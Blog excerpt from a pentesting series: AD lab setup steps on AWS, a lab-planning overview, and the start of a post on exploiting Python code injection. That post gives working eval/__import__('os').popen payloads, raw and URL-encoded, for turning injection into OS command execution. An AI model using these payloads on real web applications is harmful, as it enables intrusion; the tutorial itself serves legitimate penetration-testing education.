<div>
<i><br /></i>2) Click the Ethernet adapter</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-rjv4l1xv2ew/WQAmDcedteI/AAAAAAAABQk/ydotc8syss0ToRnhyJG-IUjCR3GrVVbTQCLcB/s1600/28%2Bethernet.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="231" src="https://1.bp.blogspot.com/-rjv4l1xv2ew/WQAmDcedteI/AAAAAAAABQk/ydotc8syss0ToRnhyJG-IUjCR3GrVVbTQCLcB/s320/28%2Bethernet.png" width="320" /></a></div>
<div>
<br />
<br />
3) Use Powershell to find the current IP, netmask, and gateway. Set the static configuration to match.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-0-WrQth1aIg/WQAnQji1CdI/AAAAAAAABQw/y1N_mc2eqNEKvA1h9gPSwnIWlbcFRGfGgCLcB/s1600/29%2B-%2Bnetwork%2Bconfig.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="214" src="https://2.bp.blogspot.com/-0-WrQth1aIg/WQAnQji1CdI/AAAAAAAABQw/y1N_mc2eqNEKvA1h9gPSwnIWlbcFRGfGgCLcB/s640/29%2B-%2Bnetwork%2Bconfig.png" width="640" /></a></div>
<div>
</div>
<h4>
Change the Hostname (Optional)</h4>
<div>
The next thing you might want to do, and this is optional, is to change the hostname to something like AWS-DC01. </div>
<div>
<br /></div>
<div>
1) If you are new to Server 2012/2016, click the folder icon in the task bar, right click <b>This PC</b>, and click <b>properties</b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-YRC-wweV0tQ/WQAoAZsdzPI/AAAAAAAABQ4/M9YEy9PQCjkdaNXgvvsb-zChmOC3xndoQCLcB/s1600/30%2B-%2Bchange%2Bhostname.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="460" src="https://4.bp.blogspot.com/-YRC-wweV0tQ/WQAoAZsdzPI/AAAAAAAABQ4/M9YEy9PQCjkdaNXgvvsb-zChmOC3xndoQCLcB/s640/30%2B-%2Bchange%2Bhostname.png" width="640" /></a></div>
<div>
<br />
2) The rest should be familiar:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-Qd9xFomq3o4/WQAo1z69CrI/AAAAAAAABRQ/XkXbvCo3CAI8e8o0fQtdA4Q9yTn8YlocgCLcB/s1600/31%2Bchange%2Bhostname.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="614" src="https://2.bp.blogspot.com/-Qd9xFomq3o4/WQAo1z69CrI/AAAAAAAABRQ/XkXbvCo3CAI8e8o0fQtdA4Q9yTn8YlocgCLcB/s640/31%2Bchange%2Bhostname.png" width="640" /></a></div>
<div>
<br /></div>
<div>
3) You will have to reboot at this point. Give it a few minutes and log back in. </div>
<div>
<br /></div>
<h4>
Promote the server to a Domain Controller</h4>
<div>
Now let's finally make it a DC. </div>
<div>
<br /></div>
<div>
1) Open <b>Server Manager</b> </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-0QlIhiXyp3I/WQAfDB2ZtaI/AAAAAAAABQE/Su0Vo8ZJwa0G8AWg4UhIzx-LP-rfXycJgCEw/s1600/22%2B-%2Bdc01%2B-%2Blaunch%2Bserver%2Bmanager.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="397" src="https://2.bp.blogspot.com/-0QlIhiXyp3I/WQAfDB2ZtaI/AAAAAAAABQE/Su0Vo8ZJwa0G8AWg4UhIzx-LP-rfXycJgCEw/s400/22%2B-%2Bdc01%2B-%2Blaunch%2Bserver%2Bmanager.png" width="400" /></a></div>
<div>
<br /></div>
<div>
2) Click <b>Manage</b>, <b>Add Roles and Features</b> </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-lEeTxcdr8EQ/WQAfDFWgbjI/AAAAAAAABQE/xXTSERFGEuEcdNLiBq0eCMxDfIkJc3DdACEw/s1600/23-%2Bdc01%2B-%2Badd%2Broles%2Band%2Bfeatures.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="166" src="https://3.bp.blogspot.com/-lEeTxcdr8EQ/WQAfDFWgbjI/AAAAAAAABQE/xXTSERFGEuEcdNLiBq0eCMxDfIkJc3DdACEw/s400/23-%2Bdc01%2B-%2Badd%2Broles%2Band%2Bfeatures.png" width="400" /></a></div>
<div>
<br />
3) <b>Next, Next, Next </b></div>
<div>
<br /></div>
<div>
4) Select <b>Active Directory Domain Services</b>, then click <b>Add Features </b></div>
<div>
<br /></div>
<div>
5) Select <b>DNS Server</b>, then click <b>Add Features</b><i> </i></div>
<div>
<i><br /></i></div>
<div>
6) <b>Next, Next, Next, Install, Close</b> </div>
<div>
<br /></div>
<div>
7) In <b>Server Manager</b>, click the yellow triangle and click <b>Promote this server to a domain controller</b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-nQZPPHnfyRo/WQAfDR2LsGI/AAAAAAAABQE/VdFM_IMHKzg1ATybEUGLOwBNKGTnR4E1QCEw/s1600/25%2B-%2Bpromote%2Bto%2Bdc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="231" src="https://4.bp.blogspot.com/-nQZPPHnfyRo/WQAfDR2LsGI/AAAAAAAABQE/VdFM_IMHKzg1ATybEUGLOwBNKGTnR4E1QCEw/s400/25%2B-%2Bpromote%2Bto%2Bdc.png" width="400" /></a></div>
<div>
<br />
8) In the wizard, select <i><b>Add new forest</b>,</i> and give it a root domain name: aws.local </div>
<div>
<br /></div>
<div>
9) Give it a restore password and drop that in your password manager</div>
<div>
<br /></div>
<div>
10) <b>Next, Next, Next, Next, Next, Install </b></div>
<div>
<br /></div>
<div>
11) When it is done, click <b>close</b> (or just wait and it will reboot) </div>
<div>
<br /></div>
<div>
12) Give it a minute and connect back. Once you connect, it will take a few minutes to fully install. </div>
<div>
<br /></div>
</div>
<div>
<br /></div>
<div>
<h3>
You now have an Active Directory Domain - Add some users</h3>
</div>
<div>
<br /></div>
<div>
I'm going to walk you through adding a bunch of users, and how to make one of those users a domain administrator. I am not going to cover setting up OU's in this post. If you are interested doing that now, take a look at this awesome post from Jared Haight: <a href="https://www.psattack.com/articles/20160718/setting-up-an-active-directory-lab-part-3/">Setting up an Active Directory Lab - Part 3</a></div>
<div>
<br /></div>
<div>
<div>
1) Within <b>server manager</b>, click <b>tools</b> at the top right and select <b>active directory users and computers</b></div>
<div>
<br /></div>
<div>
2) Double click on your domain to expand it (either on the left or the right frame)</div>
<div>
<br /></div>
<div>
3) Right click on<b> users</b> and add <b>New</b> > <b>User</b></div>
<div>
<br /></div>
<div>
4) Name your users however you want, but I like to keep it simple:<br />
<ul>
<li>First: <b>User</b></li>
<li>Last: <b>1</b></li>
<li>Login name: <b>user1</b></li>
<li>Click <b>Next</b></li>
<li>Enter an easy to crack password</li>
<li>Uncheck <b>user must change at next login</b></li>
<li>Check <b>password never expires</b></li>
<li>Next</li>
<li>Finish</li>
</ul>
5) Repeat for user2 and admin1<br />
<h3>
</h3>
<h3>
Add at least one admin user to your domain admins group</h3>
</div>
<div>
1) Within <b>Active Directory Users and Computers</b>, Double click <b>Domain Admins</b></div>
<div>
<i><br /></i></div>
<div>
2) Click <b>Members</b></div>
<div>
<i><br /></i></div>
<div>
3) Click <b>Add</b></div>
<div>
<br /></div>
<div>
4) Start typing a username of your admin user and click <b>check names</b></div>
<div>
<br /></div>
<div>
5) Click <b>OK, OK</b></div>
<div>
<br /></div>
<div>
<div>
<br /></div>
</div>
</div>
</div>
<h3>
The Homestretch - Add all hosts to the domain</h3>
<h4>
<div style="font-weight: normal;">
<br /></div>
<div>
Configure DNS</div>
</h4>
<div>
To add a machine to the domain, the one thing you NEED to do is set the domain controller as the primary DNS server. </div>
<div>
<br /></div>
<div>
1) RDP to server</div>
<div>
<br /></div>
<div>
2) Right click on the networking icon at the bottom left and click <b>Open Network and Sharing Center</b></div>
<div>
<i><br /></i></div>
<div>
3) Select <b>Ethernet</b> Adapter</div>
<div>
<br /></div>
<div>
4) Change the primary DNS server to be the IP address of your DC</div>
<div>
<br /></div>
<div>
<br /></div>
<h4>
Add host to the domain</h4>
<div>
While this process is fairly straightforward, I feel like it never works the first time for me. If you run into issues, read the notes right after these steps for ideas.</div>
<div>
<br /></div>
<div>
1) Select the folder icon in the task bar</div>
<div>
<br /></div>
<div>
2) Right click <b>This PC</b></div>
<div>
<br /></div>
<div>
3) Click <b>Properties</b></div>
<div>
<br /></div>
<div>
4) Under <b>Computer name, domain, and workgroup settings</b>, click <b>Change settings</b></div>
<div>
<br /></div>
<div>
5) Click <b>Change</b></div>
<div>
<br /></div>
<div>
6) Give your machine a better hostname: Workstation01 </div>
<div>
<br /></div>
<div>
7) Switch from <b>Workgroup</b> to <b>Domain</b> and specify the domain. For example, aws.local</div>
<div>
<br /></div>
<div>
8) Click <b>OK</b></div>
<div>
<br /></div>
<div>
9) Enter Domain Admin credentials. Go ahead and use Admin1's credentials.</div>
<div>
<br /></div>
<div>
10) Once your machine has been added, click <b>OK</b> twice</div>
<div>
<br /></div>
<div>
11) Close the window, and go ahead and <b>Restart Now</b></div>
<div>
<br /></div>
<div>
12) Repeat this for all servers</div>
<div>
<br /></div>
<div>
Having trouble adding your host to the domain? Here are some troubleshooting tips:</div>
<div>
<br /></div>
1) Can you ping the IP address of your DC from your other server(s)?<br />
2) Can you resolve the hostname of your DC from your other server(s)?<br />
3) Can you navigate to \\IP_ADDRESS_OF_DC from your other server(s)?<br />
<br />
Here are things to look for: <br />
<br />
AWS Security Groups - Make sure you didn't mess up your security group. <br />
--- Did you choose All TCP instead of All traffic? <br />
--- Did you use the wrong subnet mask for your source (or use the wrong subnet altogether)?</div>
<div>
Network Config Settings<br />
--- Did you give your DC the right subnet mask when you configured the static IP?<br />
--- Did you configure the primary DNS server properly on your non-DC host?</div>
<div>
Are you typing in the right domain name when attempting to add your host? <br />
<div>
<br /></div>
<h4>
Add domain users to the remote desktop group</h4>
<div>
<div>
1) Select the folder icon in the task bar</div>
<div>
<br /></div>
<div>
2) Right click <b>This PC</b></div>
<div>
<br /></div>
<div>
3) Click <b>Properties</b></div>
</div>
<div>
<br /></div>
<div>
4) On the left, click <b>Remote Settings</b>, and enter the domain administrator credentials</div>
<div>
<b><br /></b></div>
<div>
5) In the <b>Remote Desktop</b> section of the window, click <b>Select Users...</b></div>
<div>
<b><br /></b></div>
<div>
6) Click <b>Add...</b></div>
<div>
<b><br /></b></div>
<div>
7) Type <b>Domain users </b> and click <b>Check Names</b></div>
<div>
<b><br /></b></div>
<div>
8) Click <b>OK, OK, OK</b></div>
<div>
<b><br /></b></div>
<div>
You should now be able to RDP to this host with any of your domain users (User1, User2, Admin1)</div>
<div>
<b><br /></b></div>
<div>
<h3>
Wrap-Up</h3>
You did it! You should have 1 DC, and 1-3 additional hosts set up in AWS. You are now ready to try all sorts of stuff, like Empire, Metasploit, Mimikatz, Kerberoasting, and more.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
Feedback, suggestions, corrections, and questions are welcome!</div>
</div>
Seth Arthttp://www.blogger.com/profile/05253599496757968918noreply@blogger.com7tag:blogger.com,1999:blog-5890567984672491244.post-45412477625142183652017-05-04T17:32:00.000-04:002017-12-02T22:35:41.611-05:00Pentest Home Lab - 0x0 - Building a virtual corporate domainWhether you are a professional penetration tester or want to be become one, having a lab environment that includes a full Active Directory domain is really helpful. There have been many times where in order to learn a new skill, technique, exploit, or tool, I've had to first set it up in an AD lab environment.<br />
<br />
Reading about attacks and understanding them at a high level is one thing, but I often have a hard time really wrapping my head around something until I've done it myself. Take Kerberoasting for example: Between <a href="https://www.youtube.com/watch?v=HHJWfG9b0-E">Tim's talk a few years back</a>, <a href="https://room362.com/post/2016/kerberoast-pt1/">Rob's posts</a>, and <a href="http://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/">Will's post</a>, I knew what was happening at a high level, but I didn't want to try out an attack I'd never done before in the middle of an engagement. But before I could try it out for myself, I had to first figure out how to create an SPN. So off to Google I went, and then off to the lab:<br />
<br />
<ul>
<li>I set up MSSQL on a domain connected server in my home lab</li>
<li>I created a new user in my AD</li>
<li>I created a SPN using setspn, pairing the new user to the MSSQL instance</li>
<li>I used Empire to grab the SPN hash as an unprivileged domain user (So cool!!)</li>
<li>I sent the SPN hash to the password cracker and got the weak password </li>
</ul>
<div>
THAT was a fun night!</div>
<div>
<br /></div>
<div>
So back to the goal of this blog series. I'll share what I've learned while building my own lab(s), I'll share some of the things I've done in my lab to try and improve my skills, and for every attack I cover, I'll also cover how to set up your lab environment.</div>
<br />
<h2>
The series so far:</h2>
<div>
<ul>
<li><a href="http://sethsec.blogspot.com/2017/05/pentest-home-lab-0x0-building-virtual.html">Pentest Home Lab - 0x0 - Building A Virtual Corporate Domain</a> (This post)</li>
<li><a href="https://sethsec.blogspot.com/2017/05/pentest-home-lab-0x1-building-your-ad.html" target="">Pentest Home Lab - 0x1 - Building Your AD Lab on AWS</a></li>
<li><a href="https://sethsec.blogspot.com/2017/06/pentest-home-lab-0x2-building-your-ad.html" target="">Pentest Home Lab - 0x2 - Building Your AD Lab on Premises using Proxmox VE</a></li>
<li><a href="https://sethsec.blogspot.com/2017/08/pentest-home-lab-0x3-kerberoasting.html">Pentest Home Lab - 0x3 - Kerberoasting: Creating SPNs so you can roast them</a></li>
</ul>
</div>
<br />
<h2>
Selecting Your Virtualization Stack</h2>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-qetV_nPaRLk/WQqinSA0jzI/AAAAAAAABWQ/mxeyrz6BFXkiwI1KAIVryKh88_Jrk7FjgCEw/s1600/main.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="382" src="https://2.bp.blogspot.com/-qetV_nPaRLk/WQqinSA0jzI/AAAAAAAABWQ/mxeyrz6BFXkiwI1KAIVryKh88_Jrk7FjgCEw/s640/main.png" width="640" /></a></div>
<span style="color: red;"><br /></span>
<span style="color: red;"><br /></span>
<span style="color: red;">QUESTION: Should I build this in the cloud or on premises?</span><br />
<br />
Before we can get to any of the hacking, we need to talk about where you are going to install your virtual environment. In fact, your home lab doesn't even need to be located within your home. I'll give an overview of each option, but the decision will likely be influenced by what hardware you having lying around, how much you want to spend up front, and how much you will be using your lab. In the end, you might even want to try more than one option, as they all have distinct benefits.<br />
<br />
<h3>
Cloud Based</h3>
<div>
Often, building a home lab using dedicated hardware is cost prohibitive. In addition to hardware costs, if you add windows licensing costs, a traditional home lab can get really expensive. The good news is these days you don't need to buy any hardware or software (OS). You can build your lab using AWS, Azure, Google, etc. In addition to not having to purchase hardware, another major advantage of building your lab in the cloud is that the Windows licensing costs are built into your hourly rate (at least for AWS -- I'm not as familiar with Azure or Google). </div>
<div>
<br /></div>
<div>
<u>Pros</u> </div>
<div>
<br />
<ul>
<li><b>Hardware</b></li>
<ul>
<li>No hardware purchases</li>
</ul>
<li><b>OS Licensing</b></li>
<ul>
<li>No Windows OS software purchases</li>
<li>No expiring Windows eval licenses</li>
</ul>
<li><b>Hourly Pricing</b></li>
<ul>
<li>You only pay for the time you use the lab machines</li>
</ul>
<li><b>Education</b></li>
<ul>
<li>You will learn a lot about the cloud stack you are building on</li>
</ul>
</ul>
<br />
<u>Cons</u><br />
<ul>
<li><b style="font-weight: bold;">Cost</b></li>
<ul>
<li>Leaving your instances running gets pretty expensive. Four windows servers (t2.micro) running 24/7 will put you at around 45 bucks a month</li>
</ul>
<li><b>Keeping track of instances</b></li>
<ul>
<li>If you don't want them running all the time, you will have to remember to shut down instances when not in use or configure CloudWatch to do that for you</li>
</ul>
<li><b>You can't pause instances</b></li>
<ul>
<li>In AWS at least, you can't pause VMs like you can with virtualization software. This is pretty annoying if you are used to pausing your VM's at the end of each session and picking up where you left off</li>
</ul>
<li><b>Limited Windows OS Support</b></li>
<ul>
<li>No Windows 7/8/10 images (might be AWS specific)</li>
</ul>
<li><b>Some testing activities need to be approved</b></li>
<ul>
<li>You'll have to notify the cloud provider if you want to attack your instances from outside your virtual private cloud (VPC)</li>
</ul>
</ul>
<h4>
AWS Math</h4>
<div>
AWS can be reasonable for home use, or it can get very expensive, depending on how you use it. The key here is to think about how much you will be using your lab. If you think you will play in your lab around 3 hours a night about 10 nights a month, AWS makes a lot of sense. If you are going to be running your hosts permanently, it will probably be more cost effective to run your lab on premises.</div>
<div>
<br /></div>
<div>
Here are some cost estimations using <a href="https://calculator.s3.amazonaws.com/index.html">AWS's cost estimator</a>:</div>
<div>
<br />
<b>Update (5/8/2017)</b>: I previously did not include EBS volume costs in the tables below. I've updated the tables to include EBS volume costs (30GB for each windows volume, 20GB for Kali). You are charged for provisioned EBS volumes whether the instance is running or stopped. <br />
<br /></div>
2 Windows instances, 1 Kali instance<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-ieUfQhzfaOA/WRB2bZjbEII/AAAAAAAABXE/olQUAxFJZCwI26dVzY_7sV9WSr8PbWk1wCLcB/s1600/fixed-costs2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="186" src="https://4.bp.blogspot.com/-ieUfQhzfaOA/WRB2bZjbEII/AAAAAAAABXE/olQUAxFJZCwI26dVzY_7sV9WSr8PbWk1wCLcB/s640/fixed-costs2.png" width="640" /></a></div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
Annual cost if you use your lab 30 hours a month on average: $112/year.<br />
<br />
4 Windows instances, 1 Kali instance<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-Px_T0RBRe9k/WRB2bdcjrnI/AAAAAAAABXA/_nNV3dJAX7E0p1wS_zPj6N99D7bRS64xwCEw/s1600/fixed-costs4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="232" src="https://1.bp.blogspot.com/-Px_T0RBRe9k/WRB2bdcjrnI/AAAAAAAABXA/_nNV3dJAX7E0p1wS_zPj6N99D7bRS64xwCEw/s640/fixed-costs4.png" width="640" /></a></div>
<br />
<div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
Annual cost if you use your lab 30 hours a month on average: $196/year<br />
<br /></div>
These are just estimations. You can save money by choosing a smaller volume size at instance creation, keeping your Kali instance local, and by tearing down and rebuilding some or part of the environment if you feel like you don't need it for a few months. <br />
<br />
Also, as you can see, the difference in EC2 costs is pretty extreme if you leave your instances running all the time. Remember to turn off those instances when not in use!<br />
<br />
One caveat with building your lab entirely in the cloud, at least with AWS, is that AWS does not offer an AMI for Windows 7/8/10. While it appears possible to use your own Windows7/8/10 image, now you are back to either using eval licenses or paying for them. While doing research for this blog series, I came across something called AWS workspaces, and even that does not use 7/8/10. It simulates a desktop environment using Microsoft's Desktop Experience via Windows Server 2012. </div>
<div>
<br /></div>
<div>
After playing around with Amazon Workspaces, I realized it is not the best option for a pentest lab due to monthly costs ($7 per month per workstation), but I did learn you don't really NEED Windows 7/8/10 in your pentest home lab to do most of what we will want to do, which was a good lesson.</div>
<div>
<br />
In an upcoming post, I will write in detail about <a href="https://sethsec.blogspot.com/2017/05/pentest-home-lab-0x1-building-your-ad.html">Building your AD lab on AWS</a>.<br />
<br /></div>
<h3>
On Premises</h3>
<div>
If you are going to build the lab on your own hardware, the next decision you need to make is: Do I use dedicated hardware and a hypervisor, or do I run software that sits on top of my host OS like VMware Workstaion Pro, Workstation Player, VMware Fusion (Mac), or Virtualbox? <br />
<br />
<h4>
Using your Desktop/Laptop</h4>
</div>
<div>
If you have a desktop/laptop that has plenty of resources to spare, there is no reason you can't set this entire environment up on your OS of choice using either VMware or VirtualBox. On my laptop, I use VMware Workstation and have a test domain with 1 domain controller, 1 additional Windows server, and 1 Windows7 host. With a 1TB HDD and 16GB of RAM, I can run all three if I need to, and Kali at the same time. If you can swing 32GB and a bigger SSD, that would give you even more flexibility. As I mentioned in the cons above, you might be limited. My current laptop can't take more than 16GB.</div>
<div>
<br /></div>
<u>Pros</u><br />
<br />
<ul>
<li><b>Mobility</b></li>
<ul>
<li>Take your lab with you wherever you go (if you have a laptop)</li>
</ul>
<li><b>Easy entry</b></li>
<ul>
<li>You probably already have a Desktop/Laptop that you can use</li>
</ul>
<li><b>Free Options</b></li>
<ul>
<li>VirtualBox and VMware Workstation Player are free</li>
</ul>
</ul>
<br />
<u>Cons</u><br />
<br />
<ul>
<li><b>Cost</b></li>
<ul>
<li>VMware Workstation Pro (windows) and VMware Fusion (mac) are not free</li>
</ul>
<li><b>Hardware Limitations </b></li>
<ul>
<li>Your current desktop/laptop might be limited in how much memory you can add to it</li>
</ul>
<li><b>Shared Resourcing</b></li>
<ul>
<li>You are competing for shared resources on your host OS. This might not be acceptable</li>
<li>Every time you need to reboot your host OS, you have to stop/pause all of your VMs</li>
</ul>
</ul>
<br />
<div>
<h3>
Using a Hypervisor</h3>
<div>
Most penetration testers that I know still keep it traditional and use dedicated hardware combined with a Hypervisor for their home lab. There are plenty of great articles that talk about hardware requirements and options. I have friends who prefer to go the route of buying old enterprise software on ebay, but I have always just used consumer hardware. Either way, between the RAM and fast disks, it can get expensive. On my server, I have an AMD 8 core chip circa 2015, and I just upgraded from 16 to 32GB of RAM, and from a 512 SSD to a 1TB SSD. If you can afford it, avoid the mistake I made and just go right to 32RAM and a 1TB SSD. That will give you more than enough room to grow your lab, make templates, take lots of snapshots, etc.</div>
<div>
<br /></div>
<div>
<u>Pros</u><br />
<br />
<ul>
<li><b>Flexibility</b></li>
<ul>
<li>With dedicated hardware, you can isolate the lab on it's own network, VLAN, etc. </li>
</ul>
<li><b>Software cost</b></li>
<ul>
<li>There are plenty of free options when it comes to Hypervisors</li>
</ul>
<li><b>Options</b></li>
<ul>
<li>You can take advantage of things like KVM, containers, and thin provisioning </li>
</ul>
<li><b>Portability</b></li>
<ul>
<li>If you use something small like an Intel NUC, your lab can be portable</li>
</ul>
</ul>
<br />
<br />
<u>Cons</u><br />
<br />
<ul>
<li><b>Energy Inefficient</b></li>
<ul>
<li>The last thing anyone who reads this post needs is yet another computer running 24/7 ;)</li>
</ul>
<li><b>Cost</b></li>
<ul>
<li>Unless you have something laying around already, you'll have to buy new hardware</li>
</ul>
<li><b>Vendor Specific Knowledge</b></li>
<ul>
<li>Do you have the time and desire to learn all of the hypervisor specific troubleshooting commands when something breaks? </li>
</ul>
</ul>
<br />
<h4>
Great Home Lab Resources</h4>
</div>
<div>
<a href="https://www.darkoperator.com/blog/2017/1/28/home-lab-design">Home Lab Design</a> by Carlos Perez<br />
<a href="https://www.darkoperator.com/blog/2014/1/10/my-new-home-lab-setup">My new home lab setup</a> by Carlos Perez<br />
<a href="https://adsecurity.org/?p=2653">Building an Effective Active Directory Lab Environment for Testing</a> by Sean Metcalf<br />
<a href="https://room362.com/post/2015/intel-nuc-super-server/">Intel NUC Super Server</a> by Mubix<br />
<br />
Over the years I've played with a few of the popular Hypervisors, and here are my thoughts:</div>
<br />
<b>Vmware ESXi</b> - My first lab was ESXi. If you've never used it, I recommend using this as your Hypervisor if for no other reason than it is ubiquitous in the enterprise. You will find ESX on every internal pentest, and having experience with it from your home lab will help you one day.<br />
<br />
<b>Citrix Xen</b> - Eventually my ESX hard drive failed. After reading <a href="https://room362.com/post/2015/intel-nuc-super-server/">this post</a> by Mubix, when I rebuilt, I tried Citrix's Xen Server. I liked Xen, but I quickly ran out of space on my 512G SSD, and when I added a second drive it started to freak out. The amount of custom Xen commands I had to learn was getting out of control, and I didn't feel like the experience was going to help me all that much so I pulled the plug and looked for something new.<br />
<br />
<b>Proxmox VE</b> - For my third iteration, I'm using Proxmox VE, after my friend @mikehacksthings gave a presentation on it at a recent @IthacaSec meeting. I really like it! Thin provisioning means it uses a lot less resources, and it seems lightning fast compared to ESXi and Xen. It definitely has my stamp of approval so far. <br />
<br />
In an upcoming post, I'm going to write in detail about building your AD lab on premises using Proxmox.<br />
<div>
<br /></div>
<h3>
Getting Windows Server Software</h3>
<div>
If you are going to build your lab in the cloud, you can just relax and skip this section. If you are going to build on premises, you will need to get your hands on the following software:</div>
<div>
<ul>
<li>Required - Windows Server (2012 or 2016)</li>
<li>Optional - Windows 7 (or 8 or 10) </li>
</ul>
</div>
<div>
In terms of getting the software, there are a few options: </div>
<div>
<ol>
<li>Download evaluation versions, which are good for 180 days.</li>
<li>See if your workplace has a key/iso that can be used in a lab environment.</li>
<li>Go with a cloud solution like AWS or Azure where the licensing costs are built into your hourly rate.</li>
<li>I think if you are a student you can get the OS's for free.</li>
</ol>
</div>
For more detail on these options, check out Sean Metcalf''s blog post: <a href="https://adsecurity.org/?p=2653">Building an Effective Active Directory Lab Environment for Testing</a>. You will also notice that Sean gives some really useful breakdowns of what he feels you need in an AD lab. I'm going to keep this series more basic than that, but I encourage you to read his post. <br />
<br />
<h3>
Let's create a Domain</h3>
<div>
Once you have selected your virtualization stack, it is time to configure it. The following two posts take you through setting up two AD Lab environments. One in the cloud using AWS, and another on premises using Proxmox VE. <br />
<br />
<a href="http://sethsec.blogspot.com/2017/05/pentest-home-lab-0x1-building-your-ad.html">Pentest Home Lab - 0x1 - Building Your AD Lab on AWS</a><br />
Pentest Home Lab - 0x2 - Building Your AD Lab on Premises (Coming Soon)<br />
<br />
<h3>
Wrap-Up</h3>
Feedback, suggestions, corrections, and questions are welcome!</div>
<h2>
</h2>
<div>
<ul>
</ul>
</div>
</div>
Seth Arthttp://www.blogger.com/profile/05253599496757968918noreply@blogger.com2tag:blogger.com,1999:blog-5890567984672491244.post-17626799410416257252016-11-09T10:18:00.001-05:002016-11-20T11:40:54.946-05:00Exploiting Python Code Injection in Web ApplicationsA web application vulnerable to Python code injection allows you to send Python code though the application to the Python interpreter on the target server. If you can execute python, you can likely call operating system commands. If you can run operating system commands, you can read/write files that you have access to, and potentially even launch a remote interactive shell (e.g., nc, Metasploit, Empire). <br />
<br />
The thing is, when I needed to exploit this on an external penetration test recently, I had a hard time finding information online about how to move from proof of concept (POC) to useful web application exploitation. Together with my colleague Charlie Worrell (<span style="font-family: inherit;"><a class="url" href="https://twitter.com/decidedlygray" style="box-sizing: border-box; color: #4078c0; text-decoration: none; white-space: nowrap;">@decidedlygray</a>),</span> we were able to turn the Burp POC (sleep for 20 seconds) into a non interactive shell, which is what this post covers. <br />
<br />
Python code injection is a subset of server-side code injection, as this vulnerability can occur in many other languages (e.g., Perl and Ruby). In fact, for those of you who are CWE fans like I am, these two CWEs are right on point:<br />
<br />
<a href="https://cwe.mitre.org/data/definitions/94.html">CWE-94: Improper Control of Generation of Code ('Code Injection')</a><br />
<a href="https://cwe.mitre.org/data/definitions/95.html">CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')</a><br />
<br />
<h2>
TL;DR</h2>
<div>
If you (or Burp or another tool) finds a python injection with a payload like this:<br />
<span style="color: #783f04;"><br /></span>
<span style="color: #b45f06; font-family: "courier new" , "courier" , monospace;"><b>eval(compile('for x in range(1):\n import time\n time.sleep(20)','a','single'))</b></span></div>
<div>
<br /></div>
You can use the following payload to go from a time based POC to OS command injection:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><b><span style="color: #b45f06;">eval(compile("""for x in range(1):\\n import os\\n os.popen(r'</span><span style="color: red;">COMMAND</span><span style="color: #b45f06;">').read()""",'','single'))</span></b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
And as it turns out, you don't even need the for loop. You can use the global __import__ function:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><b><span style="color: #b45f06;">eval(compile("""__import__('os').popen(r'</span><span style="color: red;">COMMAND</span><span style="color: #b45f06;">').read()""",'','single'))</span></b></span><br />
<br />
Better yet, now that we have import and popen as one expression, in most cases, you don't even need to use compile at all:<br />
<br />
<b><span style="font-family: "courier new" , "courier" , monospace;"><span style="color: #b45f06;">__import__('os').popen('</span><span style="color: red;">COMMAND</span><span style="color: #b45f06;">').read(</span></span><span style="color: #b45f06; font-family: "courier new" , "courier" , monospace;">)</span></b><br />
<br />
To pass these to the web application, you will have to URL encode some characters. The examples from above are each encoded below to illustrate what they might look like in action:<br />
<br />
<ul>
<li><span style="color: #b45f06; font-family: "courier new" , "courier" , monospace;"><b>param=eval%28compile%28%27for%20x%20in%20range%281%29%3A%0A%20import%20time%0A%20time.sleep%2820%29%27%2C%27a%27%2C%27single%27%29%29</b></span></li>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b><span style="color: #b45f06;">param=eval%28compile%28%22%22%22for%20x%20in%20range%281%29%3A%5Cn%20import%20os%5Cn%20os.popen%28r%27</span><span style="color: red;">COMMAND</span><span style="color: #b45f06;">%27%29.read%28%29%22%22%22%2C%27%27%2C%27single%27%29%29</span></b></span></li>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b><span style="color: #b45f06;">param=eval%28compile%28%22%22%22__import__%28%27os%27%29.popen%28r%27</span><span style="color: red;">COMMAND</span><span style="color: #b45f06;">%27%29.read%28%29%22%22%22%2C%27%27%2C%27single%27%29%29</span></b></span></li>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b><span style="color: #b45f06;">param=__import__%28%27os%27%29.popen%28%27</span><span style="color: red;">COMMAND</span><span style="color: #b45f06;">%27%29.read%28%29</span></b></span></li>
</ul>
The rest of the post will dig into the details, share an intentionally vulnerable web app, and at the end of the post I'll demo a tool that Charlie and I wrote that really speeds up exploitation of this vulnerability -- kind of like what sqlmap does for SQLi, but in the infancy stage.<br />
<br />
<h2>
